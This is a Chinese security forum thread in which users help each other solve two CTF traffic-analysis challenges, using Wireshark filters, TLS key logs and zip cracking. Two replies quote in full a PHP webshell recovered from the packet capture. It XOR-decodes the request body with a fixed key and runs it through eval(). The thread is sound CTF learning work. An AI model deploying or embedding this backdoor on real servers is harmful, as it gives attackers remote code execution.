GoogleHacking 发表于 2024-6-26 17:05

2个CTF流量题

本帖最后由 GoogleHacking 于 2024-6-26 19:33 编辑

题目1.数据被偷了的附件:https://wwo.lanzn.com/i4TE022sa2xi

题目2.简单流量题附件:https://wwo.lanzn.com/inS5U22sa35g


第2题导入了ssl.log。仍然无法解密数据包内容,没法导出flag.txt,求大佬指导

第1题过滤出来了一些编码,看着像冰蝎的流量,但是看不懂什么意思,求大佬指导

Byxs20 发表于 2024-7-9 17:07

fy繁星 发表于 2024-6-26 23:35
,不知道这个Flag对不对?

肯定不对,安恒的题目的话,肯定是DASCTF{}
能提取一个这个出来,后面就不会了

async function pwdget(password) {
    const encoder = new TextEncoder();
    return window.crypto.subtle.importKey(
      "raw",
      encoder.encode(password),
      { name: "PBKDF2" },
      false,
      ["deriveBits", "deriveKey"]
    );
}

function arrBfToB64(buffer) {
    let binary = '';
    const bytes = new Uint8Array(buffer);
    for (let i = 0; i < bytes.length; i++) {
      binary += String.fromCharCode(bytes);
    }
    return window.btoa(binary);
}

function Encrypt() {
    const plainText = "";
    const password = "";
    // const ivBase64 = "";
    const iv = "";

    const k = pwdget(password);
    const key = window.crypto.subtle.deriveKey(
      { name: "PBKDF2", salt: new TextEncoder().encode("hello-dasctf"), iterations: 100000, hash: 'SHA-256' },
      k,
      { name: "AES-GCM", length: 256 },
      true,
      ["encrypt", "decrypt"]
    );

    const encoder = new TextEncoder();
    const encodedText = encoder.encode(plainText);
    const ciphertext = window.crypto.subtle.encrypt(
      { name: "AES-GCM", iv },
      key,
      encodedText
    );

    const base64Ciphertext = arrBfToB64(ciphertext);
}

GoogleHacking 发表于 2024-6-27 15:28

bushoukuaidi 发表于 2024-6-27 15:06
第二个 zip 采用crc32明文攻击可以解开压缩里flag.txtDASCTF{c956131a3e39707a19f88d4edaaa01d6}

第 ...

43b27fba4<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b";
    $bs="base64_"."decode";
        $after=$bs($data."");
        for($i=0;$i<strlen($after);$i++) {
            $after[$i] = $after[$i]^$key[$i+1&15];
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>59640d

就是这段代码。但是不知道怎么用,大佬能给指导下吗

你好,再见 发表于 2024-6-26 19:50

第二张图有qq群,建议码掉

zunmx 发表于 2024-6-26 22:27

手头没电脑,用平板稍微看了一下,这确实超出了我的能力范围了。
第一题:
尝试一下http && http.response.code==200 过滤器
发现好多post payload,里面是php代码,分析一下执行的是什么,可能存在flag



第二题:
sslkey.log 是解密https流量的,但是我也没发现和不配置这个有啥差异,最终还是和上个帖子一样,找到个zip,并且不知道密码。
id:87的地方ctrl+alt+shift+t 导出raw,删除一下http响应头就是zip文件了。


图片的话,平板截图文件太大,上传不了,只能降低一下照片品质了。

等等论坛里的大牛来看看这些问题吧。

GoogleHacking 发表于 2024-6-26 22:34

zunmx 发表于 2024-6-26 22:27
手头没电脑,用平板稍微看了一下,这确实超出了我的能力范围了。
第一题:
尝试一下http && http.respons ...

第一题看着像冰蝎的流量,但是太多了, 过滤了很多字符串做了解码,还是不行,第二题我不知道那个压缩包密码从哪里找,还有ssl.log怎么用

zunmx 发表于 2024-6-26 22:39

GoogleHacking 发表于 2024-6-26 22:34
第一题看着像冰蝎的流量,但是太多了, 过滤了很多字符串做了解码,还是不行,第二题我不知道那个压缩包 ...

ssl.log usage:

ctrl+shift+p
protocols --> tls --> (Pre)-Master-Secret log filename --> Browse...

fy繁星 发表于 2024-6-26 22:40

GoogleHacking 发表于 2024-6-26 22:34
第一题看着像冰蝎的流量,但是太多了, 过滤了很多字符串做了解码,还是不行,第二题我不知道那个压缩包 ...

第一题是蚁剑的流量(defalut编码器),用户上传了一个Shell.php,然后用蚁剑查看了upload下文件还上传了一个abc.php,但是看了一圈流量没看到什么有用的。这道题还有什么题目描述吗?

fy繁星 发表于 2024-6-26 23:35

GoogleHacking 发表于 2024-6-26 22:34
第一题看着像冰蝎的流量,但是太多了, 过滤了很多字符串做了解码,还是不行,第二题我不知道那个压缩包 ...

<?php
        //$flag = "qAjsBOZBJVwujoHDJKlEP5y1jFpJFCdGu74+1ueutAbtSQpasobqxvUwg8YvlfKEPk+KNc/gyno=";
?>,不知道这个Flag对不对?

fy繁星 发表于 2024-6-26 23:41

fy繁星 发表于 2024-6-26 23:35
,不知道这个Flag对不对?

tcp.stream eq 262,将这个流中的response的值用abc.php解密:<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b";
    $bs="base64_"."decode";
        $after=$bs($data."");
        for($i=0;$i<strlen($after);$i++) {
            $after[$i] = $after[$i]^$key[$i+1&15];
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>

GoogleHacking 发表于 2024-6-27 08:36

fy繁星 发表于 2024-6-26 23:35
,不知道这个Flag对不对?

这个是那个数据流?

GoogleHacking 发表于 2024-6-27 08:55

fy繁星 发表于 2024-6-26 23:41
tcp.stream eq 262,将这个流中的response的值用abc.php解密:

这个是不是要写解密脚本啊
页: [1] 2
查看完整版本: 2个CTF流量题